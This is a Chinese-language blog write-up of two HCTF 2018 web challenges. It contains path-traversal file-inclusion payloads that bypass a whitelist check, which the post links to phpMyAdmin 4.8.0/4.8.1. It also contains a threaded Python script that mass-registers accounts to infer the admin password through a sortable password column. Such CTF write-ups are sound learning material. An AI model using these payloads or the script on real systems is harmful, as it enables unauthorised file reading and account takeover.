<!DOCTYPE html>
<html lang="zh-CN">










<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" href="/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="description" content="">
    <meta name="author" content="chuddy">
    <meta name="keywords" content="">
    <title>HCTF 2018 wp ~ chuddy&#39;s Blog</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.7.2/css/all.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/css/mdb.min.css">
    <link rel="stylesheet" href="/css/style.css">
    <link rel="stylesheet" href="https://at.alicdn.com/t/font_1067060_vr10bjtg3us.css">
    
        <link rel="stylesheet" href="/css/Prettify/tomorrow-night-eighties.min.css">
    
</head>

<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
<div class="container">
    <a class="navbar-brand" href="/"><strong>chuddy&#39;s Blog</strong></a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
        <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <ul class="navbar-nav ml-auto text-center">
            
            <li class="nav-item">
                <a class="nav-link" href="/">Home</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/archives/">Archives</a>
            </li>
            
        </ul>
    </div>
</div>


</nav>
    <div class="view intro-2" style='background: url("/post.jpg")no-repeat center center;background-size: cover;'>
    <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
        <div class="container text-center white-text wow fadeInUp">
            <p class="h2">HCTF 2018 wp</p>
            <br>
            
            <p>Tuesday, January 8th 2019, 11:50 pm</p>
            
        </div>
        </div>
    </div>
    </div>
  </header>

  <main>
  
  <div class="container-fluid">
    <div class="row">
        <div class="col-md-8 offset-md-2 ">
            <div class="post-content py-5 z-depth-3 main">
                <h2 id="HCTF2018"><a href="#HCTF2018" class="headerlink" title="HCTF2018"></a>HCTF2018</h2><a id="more"></a>
<h3 id="web-签到题-warmup"><a href="#web-签到题-warmup" class="headerlink" title="web 签到题 warmup"></a>web 签到题 warmup</h3><p>点击之后发现是个文件包含类型的</p>
<pre><code>url:http://warmup.2018.hctf.io/index.php?file=hint.php
</code></pre><p>source.php的源码也有</p>
<pre><code> &lt;?php
    class emmm
    {
        public static function checkFile(&amp;$page)
        {
            $whitelist = [&quot;source&quot;=&gt;&quot;source.php&quot;,&quot;hint&quot;=&gt;&quot;hint.php&quot;];
            if (! isset($page) || !is_string($page)) {
                echo &quot;you can&#39;t see it&quot;;
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . &#39;?&#39;, &#39;?&#39;)
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . &#39;?&#39;, &#39;?&#39;)
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo &quot;you can&#39;t see it&quot;;
            return false;
        }
    }

    if (! empty($_REQUEST[&#39;file&#39;])
        &amp;&amp; is_string($_REQUEST[&#39;file&#39;])
        &amp;&amp; emmm::checkFile($_REQUEST[&#39;file&#39;])
    ) {
        include $_REQUEST[&#39;file&#39;];
        exit;
    } else {
        echo &quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;;
    }  
?&gt;
</code></pre><p>可以看到对我们传入的参数一定的要求</p>
<pre><code>if (!empty($_REQUEST[&#39;file&#39;])
    &amp;&amp;is_string($_REQUEST[&#39;file&#39;])
    &amp;&amp;emmm::checkFile($_REQUEST[&#39;file&#39;])
)
</code></pre><p>发现只有source.php  hint.php 才能绕过截取</p>
<pre><code>$whitelist=[&quot;source&quot;=&gt;&quot;source.php&quot;,&quot;hint&quot;=&gt;&quot;hint.php&quot;];

截取函数 截取你传入参数?前的内容
$_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . &#39;?&#39;, &#39;?&#39;)

判断截取的内容是否在数组whitelist里面

 if (in_array($_page, $whitelist)) {
        return true;
    }
    echo &quot;you can&#39;t see it&quot;;
    return false;
</code></pre><p>所以要利用?截取处hint.php或者source.php，利用hint。php成为一个不存在的目录，最后include利用../../跳出目录来读取flag</p>
<pre><code>payload:
index.php?file=source.php?/../../../../ffffllllaaaagggg
index.php?file=hint.php?/../../../../ffffllllaaaagggg
</code></pre><p>ps 直接把source的源码复制搜索就可以找到这个漏洞</p>
<p>受影响版本:</p>
<ul>
<li>phpMyAdmin4.8.0</li>
<li>phpMyAdmin4.8.1</li>
</ul>
<p><a href="https://blog.csdn.net/nzjdsds/article/details/81260335" target="_blank" rel="noopener">https://blog.csdn.net/nzjdsds/article/details/81260335</a></p>
<h3 id="Game"><a href="#Game" class="headerlink" title="Game"></a>Game</h3><p>注册账号进去之后发现，他将所有的用户名的列了出来</p>
<pre><code>http://game.2018.hctf.io/web2/user.php?order=id
</code></pre><p>通过URL发现排序的方式是可控的<br>所以我们让他按密码排序</p>
<pre><code>http://game.2018.hctf.io/web2/user.php?order=password
</code></pre><p>然后通过建立不同的账号密码来确定admin的密码</p>
<p>admin的账号的id为1</p>
<p>这是网上大佬批量注册账号的代码<br>通过这个账号来手工测试密码</p>
<pre><code>import requests
import hashlib
import threading

def md5(str):
    sha = hashlib.md5(str)
    encrypts = sha.hexdigest()
    return encrypts

def reg(username,password):
    url = &#39;http://game.2018.hctf.io/web2/action.php?action=reg&#39;
    data = {
        &quot;username&quot;:username,
        &quot;password&quot;:password,
        &quot;sex&quot;:&quot;1&quot;,
        &quot;submit&quot;:&quot;submit&quot;
    }
    headers = {
        &#39;Connection&#39;: &#39;close&#39;,
    }
    r = requests.post(url=url,data=data,headers=headers)

def fuzz(start,end):
    for i in range(start,end):
        password = &#39;dSa8&amp;&amp;!@#$%^&amp;d1nGy1aS3dj&#39;+chr(i)
        username=md5(password)
        content = username + &quot; &quot; + password +&quot; &quot;+ str(i) + &quot;\n&quot;
        reg(username, password)
        print content
    print str(start)+&#39;~&#39;+str(end)+&quot;complete&quot;

step=20
for i in range(33,127,step):
    t = threading.Thread(target=fuzz, args=(i, i+step))
    t.start()
</code></pre><p>注册好多号不断的逼近admin的密码，登录后访问flag.php【user.php里有提示】，拿到flag。</p>

                <hr>
                <div>
                    <p>
                         
                        <span class="badge badge-light">#&nbsp;writeup</span>
                        &nbsp;
                        
                    </p>
                </div>
                <br>
                
            </div>
        </div>
        <div class="d-none d-md-block col-md-2">
            
  <div id="toc" class="py-5">
    <p class="h6"><i class="iconfont icon-toc" style="vertical-align:middle"></i> Toc:</p> 
    <div id="tocbot"></div>
  </div>

        </div>
    </div>        
</div>

<br><br><br>

<!-- Comments -->
<div class="comments" id="comments">
 
</div>
  
  </main>

<footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank"><b>HEXO</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/0x2e/Material-T" target="_blank"> <b>Material-T</b></a>
  </div>
</footer>

  <!-- SCRIPTS -->
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/jquery-3.3.1.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/bootstrap.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/mdb.min.js"></script>
  <script src="/js/main.js"></script>
  
    
      <script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
    
    <script src="/js/post.js"></script>
    
      <script src="/js/plugins/prettify.js"></script>
      <script>
          $(document).ready(function(){
              $('pre').addClass('prettyprint linenums');
              prettyPrint();
          })
      </script>
    
  
</body>
</html>